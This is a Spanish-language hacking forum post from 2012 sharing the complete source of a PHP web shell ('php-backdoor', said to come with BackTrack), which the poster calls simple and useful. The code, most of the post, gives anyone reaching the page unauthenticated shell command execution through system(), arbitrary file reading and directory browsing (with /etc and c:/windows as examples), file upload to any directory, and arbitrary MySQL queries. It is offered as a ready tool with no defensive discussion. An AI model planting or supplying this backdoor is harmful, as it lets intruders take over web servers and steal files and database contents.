Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Php-backdoor [Incluido en BackTrack]

  • 0 Respuestas
  • 1017 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado 2Fac3R

  • *
  • Underc0der
  • Mensajes: 241
  • Actividad:
    0%
  • Reputación 0
  • Why be a king, when you can be a god
    • Ver Perfil
    • Escuela de Hackers & Programación
  • Skype: rockeg_18
  • Twitter: @2Fac3R
« en: Diciembre 28, 2012, 02:32:38 am »
Últimamente me he dedicado a estudiar algunas webshells en mis tiempos libres y me encontré con esta que es bastante simple y útil, viene entre las herramientas de backtrack con muchas otras más en javascript entre otras cosas.

Código: PHP
  1. <?php
  2. // a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombie \\
  3.  
  4. if(isset($_REQUEST['f'])){
  5.         $filename=$_REQUEST['f'];
  6.         $file=fopen("$filename","rb");
  7.         fpassthru($file);
  8.         die;
  9. }
  10. if(isset($_REQUEST['d'])){
  11.         $d=$_REQUEST['d'];
  12.         echo "<pre>";
  13.         if ($handle = opendir("$d")) {
  14.         echo "<h2>listing of $d</h2>";
  15.                    while ($dir = readdir($handle)){
  16.                        if (is_dir("$d/$dir")) echo "<a href='$PHP_SELF?d=$d/$dir'><font color=grey>";
  17.                             else echo "<a href='$PHP_SELF?f=$d/$dir'><font color=black>";
  18.                        echo "$dir\n";
  19.                        echo "</font></a>";
  20.                 }
  21.                        
  22.         } else echo "opendir() failed";
  23.         closedir($handle);
  24.         die ("<hr>");
  25. }
  26. if(isset($_REQUEST['c'])){
  27.     echo "<pre>";
  28.     system($_REQUEST['c']);          
  29.     die;
  30. }
  31. if(isset($_REQUEST['upload'])){
  32.  
  33.         if(!isset($_REQUEST['dir'])) die('hey,specify directory!');
  34.             else $dir=$_REQUEST['dir'];
  35.         $fname=$HTTP_POST_FILES['file_name']['name'];
  36.         if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))
  37.             die('file uploading error.');
  38. }
  39. if(isset($_REQUEST['mquery'])){
  40.    
  41.     $host=$_REQUEST['host'];
  42.     $usr=$_REQUEST['usr'];
  43.     $passwd=$_REQUEST['passwd'];
  44.     $db=$_REQUEST['db'];
  45.     $mquery=$_REQUEST['mquery'];
  46.     mysql_connect("$host", "$usr", "$passwd") or
  47.     die("Could not connect: " . mysql_error());
  48.     mysql_select_db("$db");
  49.     $result = mysql_query("$mquery");
  50.     if($result!=FALSE) echo "<pre><h2>query was executed correctly</h2>\n";
  51.     while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row);  
  52.     mysql_free_result($result);
  53.     die;
  54. }
  55. ?>
  56. <pre><form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input type="text" name="c"><input type="submit" value="go"><hr></form>
  57. <form enctype="multipart/form-data" action="<?php echo $PHP_SELF; ?>" method="post"><input type="hidden" name="MAX_FILE_SIZE" value="1000000000">
  58. upload file:<input name="file_name" type="file">   to dir: <input type="text" name="dir">&nbsp;&nbsp;<input type="submit" name="upload" value="upload"></form>
  59. <hr>to browse go to http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory here]
  60. <br>for example:
  61. http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=/etc on *nix
  62. or http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win
  63. <hr>execute mysql query:
  64. <form action="<? echo $PHP_SELF; ?>" METHOD=GET >
  65. host:<input type="text" name="host"value="localhost">  user: <input type="text" name="usr" value=root> password: <input type="text" name="passwd">
  66.  
  67. database: <input type="text" name="db">  query: <input type="text" name="mquery"> <input type="submit" value="execute">
  68. </form>
  69.  
  70. <!--    http://michaeldaw.org    2006     -->
  71.  
Espero les sea de utilidad.
Zalu2
« Última modificación: Marzo 22, 2014, 01:57:13 pm por Expermicid »
Escuela de Hackers & Programación.
http://ihackndev.blogspot.com/

 

¿Te gustó el post? COMPARTILO!